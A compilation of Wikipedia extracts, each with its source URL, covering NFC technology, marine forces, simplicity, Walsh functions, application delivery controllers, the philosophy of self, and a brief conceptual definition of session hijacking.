NFC Forum promotes NFC and certifies device compliance[5]and whether it fits in apersonal area network.[5]
GSMA defined a platform for the deployment of GSMA NFC Standards[9]within mobile handsets. GSMA's efforts include,[76]Single Wire Protocol, testing and certification and secure element.[12]The GSMA standards surrounding the deployment of NFC protocols (governed byNFC Forum) on mobile handsets are neither exclusive nor universally accepted. For example, Google's deployment ofHost Card EmulationonAndroid KitKatprovides for software control of a universal radio. In this HCE Deployment[77]the NFC protocol is leveraged without the GSMA standards.
Other standardization bodies involved in NFC include:
NFC allows one- and two-way communication between endpoints, suitable for many applications.
NFC devices can act as electronicidentity documentsandkeycards.[2]They are used incontactless paymentsystems and allowmobile paymentreplacing or supplementing systems such as credit cards andelectronic ticketsmart cards. These are sometimes calledNFC/CTLSorCTLS NFC, withcontactlessabbreviated asCTLS. NFC can be used to share small files such as contacts and for bootstrapping fast connections to share larger media such as photos, videos, and other files.[78]
NFC devices can be used in contactless payment systems, similar to those used in credit cards andelectronic ticketsmart cards, and allow mobile payment to replace/supplement these systems.
InAndroid4.4, Google introduced platform support for secure NFC-based transactions throughHost Card Emulation(HCE), for payments, loyalty programs, card access, transit passes and other custom services. HCE allows any Android 4.4 app to emulate an NFC smart card, letting users initiate transactions with their device. Apps can use a new Reader Mode to act as readers for HCE cards and other NFC-based transactions.
On September 9, 2014,Appleannounced support for NFC-powered transactions as part ofApple Pay.[79]With the introduction of iOS 11, Apple devices allow third-party developers to read data from NFC tags.[80]
As of 2022, there are five major NFC apps available in the UK: Apple Pay, Google Pay, Samsung Pay, Barclays Contactless Mobile and Fitbit Pay. The UK Finance's UK Payment Markets Summary 2021 looked at Apple Pay, Google Pay and Samsung Pay and found 17.3 million UK adults had registered for mobile payment (up 75% from the year before) and of those, 84% had made a mobile payment.[81]
NFC offers a low-speed connection with simple setup that can be used tobootstrapmore capablewireless connections.[2]For example,Android Beamsoftware uses NFC to enable pairing and establish a Bluetooth connection when doing a file transfer and then disabling Bluetooth on both devices upon completion.[82]Nokia, Samsung, BlackBerry and Sony[83]have used NFC technology to pair Bluetooth headsets, media players and speakers with one tap.[84]The same principle can be applied to the configuration of Wi-Fi networks.Samsung Galaxydevices have a feature namedS-Beam—an extension of Android Beam that uses NFC (to shareMAC addressandIP addresses) and then usesWi-Fi Directto share files and documents. The advantage of using Wi-Fi Direct over Bluetooth is that it permits much faster data transfers, running up to 300 Mbit/s.[56]
NFC can be used forsocial networking, for sharing contacts, text messages and forums, links to photos, videos or files[78]and entering multiplayermobile games.[85]
NFC-enabled devices can act as electronicidentity documentsfound in passports and ID cards, andkeycardsfor the use infare cards,transit passes,login cards, car keys andaccess badges.[2]NFC's short range and encryption support make it more suitable than less private RFID systems.
NFC-equipped smartphones can be paired withNFC Tagsor stickers that can be programmed by NFC apps. These programs can allow a change of phone settings, texting, app launching, or command execution.
Such apps do not rely on a company or manufacturer, but can be utilized immediately with an NFC-equipped smartphone and an NFC tag.[86]
The NFC Forum published theSignature Record Type Definition(RTD) 2.0 in 2015 to add integrity and authenticity for NFC Tags. This specification allows an NFC device to verify tag data and identify the tag author.[87]
NFC has been used invideo gamesstarting withSkylanders: Spyro's Adventure.[88]These are customizable figurines which contain personal data with each figure, so no two figures are exactly alike. Nintendo'sWii U GamePadwas the first console system to include NFC technology out of the box. It was later included in theNintendo 3DSrange (being built into the New Nintendo 3DS/XL and in a separately sold reader which usesInfraredto communicate to older 3DS family consoles) and theNintendo Switchrange (being built within the rightJoy-Concontroller and directly in the Nintendo Switch Lite). Theamiiborange of accessories utilize NFC technology to unlock features.
Adidas Telstar 18is a soccer ball that contains an NFC chip within.[89]The chip enables users to interact with the ball using a smartphone.[90]
NFC and Bluetooth are both relatively short-range communication technologies available onmobile phones. NFC operates at slower speeds than Bluetooth and has a much shorter range, but consumes far less power and doesn't require pairing.[91]
NFC sets up more quickly than standard Bluetooth, but has a lower transfer rate thanBluetooth low energy. With NFC, instead of performing manual configurations to identify devices, the connection between two NFC devices is automatically established in less than .1 second. The maximum data transfer rate of NFC (424 kbit/s) is slower than that of Bluetooth V2.1 (2.1 Mbit/s).
NFC's maximum working distance of less than20 cm (7+7⁄8in) reduces the likelihood of unwanted interception, making it particularly suitable for crowded areas that complicate correlating a signal with its transmitting physical device (and by extension, its user).[92]
NFC is compatible with existing passive RFID (13.56 MHz ISO/IEC 18000-3) infrastructures. It requires comparatively low power, similar to the Bluetooth V4.0 low-energy protocol. However, when NFC works with an unpowered device (e.g. on a phone that may be turned off, a contactless smart credit card, a smart poster), the NFC power consumption is greater than that of Bluetooth V4.0 Low Energy, since illuminating the passive tag needs extra power.[91]
In 2011, handset vendors released more than 40 NFC-enabled handsets with theAndroidmobile operating system.BlackBerrydevices support NFC using BlackBerry Tag on devices running BlackBerry OS 7.0 and greater.[93]
MasterCardadded further NFC support for PayPass for the Android and BlackBerry platforms, enabling PayPass users to make payments using their Android or BlackBerry smartphones.[94]A partnership betweenSamsungandVisaadded a 'payWave' application on the Galaxy S4 smartphone.[95]
In 2012,Microsoftadded native NFC functionality in theirmobile OSwithWindows Phone 8, as well as theWindows 8operating system. Microsoft provides the "Wallet hub" in Windows Phone 8 for NFC payment, and can integrate multiple NFC payment services within a single application.[96]
In 2014,iPhone 6was released fromAppleto support NFC.[97]and since September 2019 iniOS 13Apple now allows NFC tags to be read out as well as labeled using an NFC app.[citation needed]
As of April 2011 hundreds of NFC trials had been conducted. Some firms moved to full-scale service deployments, spanning one or more countries. Multi-country deployments includeOrange's rollout of NFC technology to banks, retailers, transport, and service providers in multiple European countries,[42]andAirtel AfricaandOberthur Technologiesdeploying to 15 countries throughout Africa.[98]
|
https://en.wikipedia.org/wiki/Near-field_communication
|
Many countries around the world maintainmarinesandnaval infantrymilitary units. Even if only a few nations have the capabilities to launch major amphibious assault operations, most marines and naval infantry forces are able to carry out limitedamphibious landings, riverine andcoastal warfaretasks. The list includes also army units specifically trained to operate as marines or naval infantry forces, and navy units with specialized naval security and boarding tasks.
TheMarine Fusiliers Regimentsare the marine infantry regiments of theAlgerian Navyand they are specialised inamphibious warfare.[1]
The RFM have about 7000 soldiers in their ranks.
Within the Algerian navy there are 8 regiments of marine fusiliers:
Future marine fusiliers andmarine commandosare trained in:
Army
Navy
Army
Navy
The IDF's35th Parachute Brigade "Flying Serpent"is aparatroopersbrigade that also exercises sea landing capabilities.
The Italian Army'sCavalry Brigade "Pozzuolo del Friuli"forms with theItalian Navy's 3rd Naval Division andSan Marco Marine BrigadetheItalian military's National Sea Projection Capability (Forza di proiezione dal mare).
Additionally the 17th Anti-aircraft Artillery Regiment "Sforzesca" provides air-defense assets:
|
https://en.wikipedia.org/wiki/List_of_marines_and_similar_forces
|
Simplicityis the state or quality of beingsimple. Something easy to understand or explain seems simple, in contrast to something complicated. Alternatively, asHerbert A. Simonsuggests, something is simple orcomplexdepending on the way we choose to describe it.[1]In some uses, the label "simplicity" can implybeauty, purity, or clarity. In other cases, the term may suggest a lack of nuance or complexity relative to what is required.
The concept of simplicity is related to the field ofepistemologyandphilosophy of science(e.g., inOccam's razor). Religions also reflect on simplicity with concepts such asdivine simplicity. In humanlifestyles, simplicity can denote freedom from excessive possessions or distractions, such as having asimple livingstyle. In some cases, the term may have negative connotations, as when referring to someone as asimpleton.
There is a widespread philosophical presumption that simplicity is a theoretical virtue. This presumption that simpler theories are preferable appears in many guises. Often it remains implicit; sometimes it is invoked as a primitive, self-evident proposition; other times it is elevated to the status of a ‘Principle’ and labeled as such (for example, the 'Principle of Parsimony'.[2]
According toOccam's razor, all other things being equal, thesimplesttheory is most likely true. In other words, simplicity is a meta-scientific criterion by which scientists evaluate competing theories.
A distinction is often made by many persons[by whom?]between two senses of simplicity:syntactic simplicity(the number and complexity of hypotheses), andontological simplicity(the number and complexity of things postulated). These two aspects of simplicity are often referred to aseleganceandparsimonyrespectively.[3]
John von Neumanndefines simplicity as an important esthetic criterion of scientific models:
[...] (scientific model) must satisfy certain esthetic criteria - that is, in relation to how much it describes, it must be rather simple. I think it is worth while insisting on these vague terms - for instance, on the use of word rather. One cannot tell exactly how "simple" simple is. [...] Simplicity is largely a matter of historical background, of previous conditioning, of antecedents, of customary procedures, and it is very much a function of what is explained by it.[4]
The recognition that too much complexity can have a negative effect on business performance was highlighted in research undertaken in 2011 by Simon Collinson of theWarwick Business Schooland the Simplicity Partnership, which found that managers who are orientated towards finding ways of making business "simpler and more straightforward" can have a beneficial impact on their organisation.
Most organizations contain some amount of complexity that is not performance enhancing, but drains value out of the company. Collinson concluded that this type of 'bad complexity' reduced profitability (EBITDA) by more than 10%.[5]
Collinson identified a role for "simplicity-minded managers", managers who were "predisposed towards simplicity", and identified a set of characteristics related to the role, namely "ruthless prioritisation", the ability to say "no", willingness to iterate, to reduce communication to the essential points of a message and the ability to engage a team.[5]His report, theGlobal Simplicity Index 2011, was the first ever study to calculate the cost of complexity in the world's largest organisations.[6]
TheGlobal Simplicity Indexidentified that complexity occurs in five key areas of an organisation: people, processes, organisational design, strategy, and products and services.[7]As the "global brands report", the research is repeated and published annually.[8]: 3The 2022 report incorporates a "brandsimplicity score" and an "industry simplicity score".[9]
Research by Ioannis Evmoiridis atTilburg Universityfound that earnings reported by "high simplicity firms" are higher than among other businesses, and that such firms "exhibit[ed] a superior performance during the period 2010 - 2015", whilst requiring lower average capital expenditure and lowerleverage.[8]: 18
Simplicity is a theme in theChristianreligion. According toSt. Thomas Aquinas, God isinfinitely simple. The Roman Catholic and Anglican religious orders ofFranciscansalso strive for personal simplicity. Members of theReligious Society of Friends(Quakers) practice theTestimony of Simplicity, which involves simplifying one'slifeto focus on what is important and disregard or avoid what is least important. Simplicity is tenet of Anabaptistism, and someAnabaptistgroups like theBruderhof, make an effort to live simply.[10][11]
In the context of humanlifestyle, simplicity can denote freedom from excessive material consumption and psychological distractions.
"Receive with simplicity everything that happens to you." —Rashi(French rabbi, 11th century), citation at the beginning of the filmA Serious Man(2009),Coen Brothers
|
https://en.wikipedia.org/wiki/Global_Simplicity_Index
|
Inmathematics, more specifically inharmonic analysis,Walsh functionsform acomplete orthogonal setoffunctionsthat can be used to represent any discrete function—just liketrigonometric functionscan be used to represent anycontinuous functioninFourier analysis.[1]They can thus be viewed as a discrete, digital counterpart of the continuous, analog system of trigonometric functions on theunit interval. But unlike thesine and cosinefunctions, which are continuous, Walsh functions are piecewiseconstant. They take the values −1 and +1 only, on sub-intervals defined bydyadic fractions.
The system of Walsh functions is known as theWalsh system. It is an extension of theRademacher systemof orthogonal functions.[2]
Walsh functions, the Walsh system, the Walsh series,[3]and thefast Walsh–Hadamard transformare all named after the American mathematicianJoseph L. Walsh. They find various applications inphysicsandengineeringwhenanalyzing digital signals.
Historically, variousnumerationsof Walsh functions have been used; none of them is particularly superior to another. This articles uses theWalsh–Paley numeration.
We define the sequence of Walsh functionsWk:[0,1]→{−1,1}{\displaystyle W_{k}:[0,1]\rightarrow \{-1,1\}},k∈N{\displaystyle k\in \mathbb {N} }as follows.
For anynatural numberk, andreal numberx∈[0,1]{\displaystyle x\in [0,1]}, let
Then, by definition
In particular,W0(x)=1{\displaystyle W_{0}(x)=1}everywhere on the interval, since all bits ofkare zero.
Notice thatW2m{\displaystyle W_{2^{m}}}is precisely theRademacher functionrm.
Thus, the Rademacher system is a subsystem of the Walsh system. Moreover, every Walsh function is a product of Rademacher functions:
Walsh functions and trigonometric functions are both systems that form a complete,orthonormalset of functions, anorthonormal basisin theHilbert spaceL2[0,1]{\displaystyle L^{2}[0,1]}of thesquare-integrable functionson the unit interval. Both are systems ofbounded functions, unlike, say, theHaar systemor the Franklin system.
Both trigonometric and Walsh systems admit natural extension by periodicity from the unit interval to thereal line. Furthermore, bothFourier analysison the unit interval (Fourier series) and on the real line (Fourier transform) have their digital counterparts defined via Walsh system, the Walsh series analogous to the Fourier series, and theHadamard transformanalogous to the Fourier transform.
The Walsh system{Wk},k∈N0{\displaystyle \{W_{k}\},k\in \mathbb {N} _{0}}is anabelianmultiplicativediscrete groupisomorphicto∐n=0∞Z/2Z{\displaystyle \coprod _{n=0}^{\infty }\mathbb {Z} /2\mathbb {Z} }, thePontryagin dualof theCantor group∏n=0∞Z/2Z{\displaystyle \prod _{n=0}^{\infty }\mathbb {Z} /2\mathbb {Z} }. ItsidentityisW0{\displaystyle W_{0}}, and every element is ofordertwo (that is, self-inverse).
The Walsh system is an orthonormal basis of the Hilbert spaceL2[0,1]{\displaystyle L^{2}[0,1]}. Orthonormality means
and being a basis means that if, for everyf∈L2[0,1]{\displaystyle f\in L^{2}[0,1]}, we setfk=∫01f(x)Wk(x)dx{\displaystyle f_{k}=\int _{0}^{1}f(x)W_{k}(x)dx}then
It turns out that for everyf∈L2[0,1]{\displaystyle f\in L^{2}[0,1]}, theseries∑k=0∞fkWk(x){\displaystyle \sum _{k=0}^{\infty }f_{k}W_{k}(x)}convergestof(x){\displaystyle f(x)}for almost everyx∈[0,1]{\displaystyle x\in [0,1]}.
The Walsh system (in Walsh-Paley numeration) forms aSchauder basisinLp[0,1]{\displaystyle L^{p}[0,1]},1<p<∞{\displaystyle 1<p<\infty }. Note that, unlike theHaar system, and like the trigonometric system, this basis is notunconditional, nor is the system a Schauder basis inL1[0,1]{\displaystyle L^{1}[0,1]}.
LetD=∏n=1∞Z/2Z{\displaystyle \mathbb {D} =\prod _{n=1}^{\infty }\mathbb {Z} /2\mathbb {Z} }be thecompactCantor groupendowed withHaar measureand letD^=∐n=1∞Z/2Z{\displaystyle {\hat {\mathbb {D} }}=\coprod _{n=1}^{\infty }\mathbb {Z} /2\mathbb {Z} }be its discrete group ofcharacters. Elements ofD^{\displaystyle {\hat {\mathbb {D} }}}are readily identified with Walsh functions. Of course, the characters are defined onD{\displaystyle \mathbb {D} }while Walsh functions are defined on the unit interval, but since there exists amodulo zero isomorphismbetween thesemeasure spaces, measurable functions on them are identified viaisometry.
Then basicrepresentation theorysuggests the following broad generalization of the concept ofWalsh system.
For an arbitraryBanach space(X,||⋅||){\displaystyle (X,||\cdot ||)}let{Rt}t∈D⊂AutX{\displaystyle \{R_{t}\}_{t\in \mathbb {D} }\subset \operatorname {Aut} X}be astrongly continuous, uniformly boundedfaithfulactionofD{\displaystyle \mathbb {D} }onX. For everyγ∈D^{\displaystyle \gamma \in {\hat {\mathbb {D} }}}, consider itseigenspaceXγ={x∈X:Rtx=γ(t)x}{\displaystyle X_{\gamma }=\{x\in X:R_{t}x=\gamma (t)x\}}. ThenXis the closed linear span of the eigenspaces:X=Span¯(Xγ,γ∈D^){\displaystyle X={\overline {\operatorname {Span} }}(X_{\gamma },\gamma \in {\hat {\mathbb {D} }})}. Assume that every eigenspace is one-dimensionaland pick an elementwγ∈Xγ{\displaystyle w_{\gamma }\in X_{\gamma }}such that‖wγ‖=1{\displaystyle \|w_{\gamma }\|=1}. Then the system{wγ}γ∈D^{\displaystyle \{w_{\gamma }\}_{\gamma \in {\hat {\mathbb {D} }}}}, or the same system in the Walsh-Paley numeration of the characters{wk}k∈N0{\displaystyle \{w_{k}\}_{k\in {\mathbb {N} }_{0}}}is called generalized Walsh system associated with action{Rt}t∈D{\displaystyle \{R_{t}\}_{t\in \mathbb {D} }}. Classical Walsh system becomes a special case, namely, for
where⊕{\displaystyle \oplus }is additionmodulo2.
In the early 1990s, Serge Ferleger and Fyodor Sukochev showed that in a broad class of Banach spaces (so calledUMDspaces[4]) generalized Walsh systems have many properties similar to the classical one: they form a Schauder basis[5]and a uniform finite-dimensional decomposition[6]in the space, have property of random unconditional convergence.[7]One important example of generalized Walsh system is Fermion Walsh system in non-commutativeLpspaces associated withhyperfinite type II factor.
TheFermion Walsh systemis a non-commutative, or "quantum" analog of the classical Walsh system. Unlike the latter, it consists of operators, not functions. Nevertheless, both systems share many important properties, e.g., both form an orthonormal basis in corresponding Hilbert space, orSchauder basisin corresponding symmetric spaces. Elements of the Fermion Walsh system are calledWalsh operators.
The termFermionin the name of the system is explained by the fact that the enveloping operator space, the so-calledhyperfinite type II factorR{\displaystyle {\mathcal {R}}}, may be viewed as the space ofobservablesof the system of countably infinite number of distinctspin1/2{\displaystyle 1/2}fermions. EachRademacheroperator acts on one particular fermion coordinate only, and there it is aPauli matrix. It may be identified with the observable measuring spin component of that fermion along one of the axes{x,y,z}{\displaystyle \{x,y,z\}}in spin space. Thus, a Walsh operator measures the spin of a subset of fermions, each along its own axis.
Fix a sequenceα=(α1,α2,...){\displaystyle \alpha =(\alpha _{1},\alpha _{2},...)}ofintegerswithαk≥2,k=1,2,…{\displaystyle \alpha _{k}\geq 2,k=1,2,\dots }and letG=Gα=∏n=1∞Z/αkZ{\displaystyle \mathbb {G} =\mathbb {G} _{\alpha }=\prod _{n=1}^{\infty }\mathbb {Z} /\alpha _{k}\mathbb {Z} }endowed with theproduct topologyand the normalized Haar measure. DefineA0=1{\displaystyle A_{0}=1}andAk=α1α2…αk−1{\displaystyle A_{k}=\alpha _{1}\alpha _{2}\dots \alpha _{k-1}}. Eachx∈G{\displaystyle x\in \mathbb {G} }can be associated with the real number
This correspondence is a module zero isomorphism betweenG{\displaystyle \mathbb {G} }and the unit interval. It also defines a norm which generates thetopologyofG{\displaystyle \mathbb {G} }. Fork=1,2,…{\displaystyle k=1,2,\dots }, letρk:G→C{\displaystyle \rho _{k}:\mathbb {G} \to \mathbb {C} }where
The set{ρk}{\displaystyle \{\rho _{k}\}}is calledgeneralized Rademacher system. The Vilenkin system is thegroupG^=∐n=1∞Z/αkZ{\displaystyle {\hat {\mathbb {G} }}=\coprod _{n=1}^{\infty }\mathbb {Z} /\alpha _{k}\mathbb {Z} }of (complex-valued) characters ofG{\displaystyle \mathbb {G} }, which are all finite products of{ρk}{\displaystyle \{\rho _{k}\}}. For each non-negative integern{\displaystyle n}there is a unique sequencen0,n1,…{\displaystyle n_{0},n_{1},\dots }such that0≤nk<αk+1,k=0,1,2,…{\displaystyle 0\leq n_{k}<\alpha _{k+1},k=0,1,2,\dots }and
ThenG^=χn|n=0,1,…{\displaystyle {\hat {\mathbb {G} }}={\chi _{n}|n=0,1,\dots }}where
In particular, ifαk=2,k=1,2...{\displaystyle \alpha _{k}=2,k=1,2...}, thenG{\displaystyle \mathbb {G} }is the Cantor group andG^={χn|n=0,1,…}{\displaystyle {\hat {\mathbb {G} }}=\left\{\chi _{n}|n=0,1,\dots \right\}}is the (real-valued) Walsh-Paley system.
The Vilenkin system is a complete orthonormal system onG{\displaystyle \mathbb {G} }and forms aSchauder basisinLp(G,C){\displaystyle L^{p}(\mathbb {G} ,\mathbb {C} )},1<p<∞{\displaystyle 1<p<\infty }.[8]
Nonlinear phase extensions of discrete Walsh-Hadamard transformwere developed. It was shown that the nonlinear phase basis functions with improved cross-correlation properties significantly outperform the traditional Walsh codes in code division multiple access (CDMA) communications.[9]
Applications of the Walsh functions can be found wherever digit representations are used, includingspeech recognition, medical and biologicalimage processing, anddigital holography.
For example, thefast Walsh–Hadamard transform(FWHT) may be used in the analysis of digitalquasi-Monte Carlo methods. Inradio astronomy, Walsh functions can help reduce the effects of electricalcrosstalkbetween antenna signals. They are also used in passiveLCDpanels as X and Y binary driving waveforms where the autocorrelation between X and Y can be made minimal forpixelsthat are off.
|
https://en.wikipedia.org/wiki/Walsh_function
|
Anapplication delivery controller(ADC) is acomputer networkdevice in adatacenter, often part of anapplication delivery network(ADN), that helps perform common tasks, such as those done byweb acceleratorsto remove load from theweb serversthemselves. Many also provideload balancing. ADCs are often placed in theDMZ, between the outerfirewallor router and aweb farm.[citation needed]
An Application Delivery Controller (ADC) is a type of server that provides a variety of services designed to optimize the distribution of load being handled by backend content servers. An ADC directs web request traffic to optimal data sources in order to remove unnecessary load from web servers. To accomplish this, an ADC includes many OSI layer 3-7 services, including load-balancing.
ADCs are intended to be deployed within the DMZ of a computer server cluster hosting web applications and/or services. In this sense, an ADC can be envisioned as a drop-in load balancer replacement. But that is where the similarities end. When an ADC receives a web request from an external host, it enacts the following process (assuming all features exist and are enabled):
Features commonly found in ADCs include:
In the context of Telco infrastructure, an ADC could provide access control services for a Gi-LAN area.
Starting around 2004, first generation ADCs offered simple application acceleration andload balancing.[citation needed]
In 2006, ADCs began to mature when they began featuring advanced applications services such ascompression,caching,connection multiplexing,traffic shaping,application layer security,SSL offload, andcontent switching, combined with services like serverload balancingin an integrated services framework that optimized and secured business critical application flows.[citation needed]
By 2007, application acceleration products were available from many companies.[1]
Until leaving the market in 2012,Cisco Systemsoffered application delivery controllers. Market leaders likeF5 Networks,Radware, andCitrixhad been gaining market share from Cisco in previous years.[2]
The ADC market segment became fragmented into two general areas: 1) general network optimization; and 2) application/framework specific optimization. Both types of devices improve performance, but the latter is usually more aware of optimization strategies that work best with a particular application framework, focusing onASP.NETorAJAXapplications, for example.[3][4]
|
https://en.wikipedia.org/wiki/Application_delivery_controller
|
Inphilosophy, theselfis anindividual's ownbeing,knowledge, andvalues, and the relationship between these attributes.
The first-person perspective distinguishes selfhood frompersonal identity. Whereas "identity" is (literally) sameness[1]and may involvecategorizationandlabeling,[2]selfhood implies a first-person perspective and suggests potential uniqueness. Conversely, "person" is used as a third-person reference. Personal identity can be impaired in late-stageAlzheimer's diseaseand in otherneurodegenerative diseases. Finally, the self is distinguishable from "others". Including the distinction between sameness andotherness, the self versus other is a research topic in contemporaryphilosophy[3]and contemporaryphenomenology(see alsopsychological phenomenology),psychology,psychiatry,neurology, andneuroscience.
Althoughsubjective experienceis central to selfhood, the privacy of this experience is only one of many problems in thephilosophy of selfandscientificstudy ofconsciousness.
The psychology of self is the study of either thecognitiveandaffectiverepresentation of one's identity or the subject of experience. The earliest formulation of the self inmodern psychologyforms the distinction between two elements I and me. The self asI, is the subjective knower. While, the self asMe, is the subject that is known.[4]Current views of the self in psychology positions the self as playing an integral part in human motivation, cognition, affect, andsocial identity.[5]Self, following the ideas ofJohn Locke, has been seen as a product ofepisodic memory[6]but research on people withamnesiareveals that they have a coherent sense of self based on preserved conceptual autobiographical knowledge.[7]Hence, it is possible to correlate cognitive and affective experiences of self with neural processes. A goal of this ongoing research is to provide grounding insight into the elements of which the complex multiple situated selves of human identity are composed.
What the Freudian tradition has subjectively called, "sense of self" is for Jungian analytic psychology, where one's identity is lodged in the persona oregoand is subject to change in maturation.Carl Jungdistinguished, "The self is not only the center but also the whole circumference which embraces both conscious and unconscious; it is the center of this totality...".[8]TheSelf in Jungian psychologyis "the archetype of wholeness and the regulating center of the psyche ... a transpersonal power that transcends the ego."[9][10]As aJungian archetype, it cannot be seen directly, but by ongoing individuating maturation and analytic observation, can be experienced objectively by its cohesive wholeness-making factor.[11]
Meanwhile,self psychologyis a set of psychotherapeutic principles and techniques established by the Austrian-born American psychoanalystHeinz Kohutupon the foundation of the psychoanalytic method developed by Freud, and is specifically focused on the subjectivity of experience, which, according to self psychology, is mediated by a psychological structure called the self.[12]Examples of psychiatric conditions where such "sameness" may become broken includedepersonalization, which sometimes occurs inschizophrenia, where the self appears different from the subject.
The 'Disorders of the Self' have also been extensively studied by psychiatrists.[13]
For example, facial andpattern recognitiontake large amounts of brain processing capacity butpareidoliacannot explain many constructs of self for cases of disorder, such as schizophrenia or schizoaffective disorder.
One's sense of self can also be changed upon becoming part of a stigmatized group. According to Cox,Abramson,Devine, and Hollon (2012), if an individual has prejudice against a certain group, like the elderly and then later becomes part of this group. This prejudice can be turned inward causing depression.[14]
The philosophy of a disordered self, such as inschizophrenia, is described in terms of what the psychiatrist understands are actual events in terms of neuron excitation but are delusions nonetheless, and the schizo-affective or a schizophrenic person also believes are actual events in terms of essential being. PET scans have shown that auditory stimulation is processed in certain areas of the brain, and imagined similar events are processed in adjacent areas, but hallucinations are processed in the same areas as actual stimulation. In such cases, external influences may be the source of consciousness and the person may or may not be responsible for "sharing" in the mind's process, or the events which occur, such as visions and auditory stimuli, may persist and be repeated often over hours, days, months or years—and the afflicted person may believe themselves to be in a state of rapture or possession.
Two areas of thebrainthat are important in retrievingself-knowledgeare themedial prefrontal cortexand the medial posterior parietal cortex.[15]Theposterior cingulate cortex, theanterior cingulate cortex, and medial prefrontal cortex are thought to combine to provide humans with the ability to self-reflect. Theinsular cortexis also thought to be involved in the process ofself-reference.[16]
Cultureconsists of explicit and implicit patterns of historically derived and selected ideas and their embodiment in institutions, cognitive and social practices, and artifacts. Cultural systems may, on the one hand, be considered as products of action, and on the other, as conditioning elements of further action.[17]The way individuals construct themselves may be different due to their culture.[18]
Hazel Rose MarkusandShinobu Kitayama's theory of the interdependent self hypothesizes that representations of the self in human cultures fall on a continuum fromindependenttointerdependent. The independent self is supposed to be egoistic, unique, separated from the various contexts, critical in judgment, and prone to self-expression. The interdependent self is supposed to be altruistic, similar with the others, flexible according to contexts, conformist, and unlikely to express opinions that would disturb the harmony of his or her group of belonging.[19]However, this theory has been criticized by other sociologists, includingDavid Matsumoto[20]for being based on popular stereotypes and myths about different cultures rather than on rigorous scientific research. A 2016 study[21]of 10,203 participants from 55 cultural groups also failed to find a correlation between the postulating series of causal links between culture and self-construals, finding instead that correlations between traits varied both across cultures did not correlate with Markus & Kitayama's identifications of "independent" or "interdependent" self.[22]
The philosophy of self seeks to describe essential qualities that constitute a person's uniqueness or a person's essential being. There have been various approaches to defining these qualities. The self can be considered as the source of consciousness, theagentresponsiblefor an individual's thoughts and actions, or thesubstantialnature of a person which endures and unifies consciousness over time.
The self has a particular prominence in the thought ofRené Descartes(1596-1650).[23]In addition to the writings ofEmmanuel Levinas(1906-1995) on "otherness", the distinction between "you" and "me" has been further elaborated inMartin Buber's 1923 philosophical workIch und Du.
In philosophy, the problem ofpersonal identity[24]is concerned with how one is able to identify a single person over a time interval, dealing with such questions as, "What makes it true that a person at one time is the same thing as a person at another time?" or "What kinds of things are we persons?"
A question related to the problem of personal identity is Benj Hellie'svertiginous question. The vertiginous question asks why, of all the subjects of experience out there,thisone—the one corresponding to the human being referred to as Benj Hellie—is the one whose experiences arelive? (The reader is supposed to substitute their own case for Hellie's.)[25]Hellie's argument is closely related to Caspar Hare's theories ofegocentric presentismandperspectival realism, of which several other philosophers have written reviews.[26]Similar questions are also asked repeatedly byJ. J. Valbergin justifying hishorizonalview of the self,[27]and byThomas NagelinThe View from Nowhere.[28][29]Tim S. Roberts refers to the question of why a particular organism out of all the organisms that happen to exist happens to be you as the "Even Harder Problem of Consciousness".[30]
Open individualismis a view in the philosophy of self, according to which there exists only one numericallyidenticalsubject, who is everyone at all times, in the past, present and future.[31]: 617It is a theoretical solution to the question of personal identity, being contrasted with "Empty individualism", the view that personal identities correspond to a fixed pattern that instantaneously disappears with the passage of time, and "Closed individualism", the common view that personal identities are particular to subjects and yet survive over time.[31]: xxii
Open individualism is related to the concept ofanattāin Buddhist philosophy. In Buddhism, the term anattā (Pali:𑀅𑀦𑀢𑁆𑀢𑀸) or anātman (Sanskrit:अनात्मन्) is the doctrine of "non-self" – that no unchanging, permanent self or essence can be found in any phenomenon. While often interpreted as a doctrine denying the existence of a self,anatmanis more accurately described as a strategy to attain non-attachment by recognizing everything as impermanent, while staying silent on the ultimate existence of an unchanging essence.[32][33]In contrast, dominant schools of Hinduism assert the existence ofĀtmanaspure awarenessorwitness-consciousness,[34][35][36]"reify[ing] consciousness as an eternal self."[37]
One thought experiment in the philosophy of personal identity is theteletransportation paradox. It deals with whether the concept of one'sfuture selfis a coherent concept. The thought experiment was formulated byDerek Parfitin his 1984 bookReasons and Persons.[38]Derek Parfit and others consider a hypothetical "teletransporter", a machine that puts you to sleep, records your molecular composition, breaking you down into atoms, and relaying its recording to Mars at the speed of light. On Mars, another machine re-creates you (from local stores of carbon, hydrogen, and so on), each atom in exactly the same relative position. Parfit poses the question of whether or not the teletransporter is actually a method of travel, or if it simply kills and makes an exact replica of the user.[39]Then the teleporter is upgraded. The teletransporter on Earth is modified to not destroy the person who enters it, but instead it can simply make infinite replicas, all of whom would claim to remember entering the teletransporter on Earth in the first place. Using thought experiments such as these, Parfit argues that any criteria we attempt to use to determine sameness of person will be lacking, because there is nofurther fact. What matters, to Parfit, is simply "Relation R", psychological connectedness, including memory, personality, and so on.[40]
Religious views on the Self vary widely. The Self is a complex and core subject in many forms ofspirituality. Two types of Self are commonly considered—the Self that is the ego, also called the learned, superficial Self of mind and body, egoic creation, and the Self which is sometimes called the "True Self", the "Observing Self", or the "Witness".[41]InHinduism, theĀtman(Self), despite being experienced as an individual, is actually a representation of the unified transcendent reality,Brahman.[42]Our experience of reality doesn't match the nature of Brahman due tomāyā.
One description of spirituality is the Self's search for "ultimate meaning" through an independent comprehension of the sacred. Another definition of spiritual identity is: "A persistent sense of Self that addresses ultimate questions about the nature, purpose, and meaning of life, resulting in behaviors that are consonant with the individual’s core values. Spiritual identity appears when the symbolic religious and spiritual value of a culture is found by individuals in the setting of their own life. There can be different types of spiritual Self because it is determined by one's life and experiences."[43]
Human beings have a Self—that is, they are able to look back on themselves as both subjects and objects in the universe. Ultimately, this brings questions about who we are and the nature of our own importance.[44]Traditions such as inBuddhismsee theattachmenttoSelfis an illusion that serves as the main cause ofsufferingand unhappiness.[45]
|
https://en.wikipedia.org/wiki/Self
|
Incomputer science,session hijacking, sometimes also known ascookie hijacking, is theexploitationof a validcomputer session—sometimes also called asession key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many websites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (seeHTTP cookie theft). After successfully stealing appropriate session cookies an adversary might use the Pass the Cookie technique to perform session hijacking. Cookie hijacking is commonly used against client authentication on the internet. Modern web browsers use cookie protection mechanisms to protect the web from being attacked.[1]
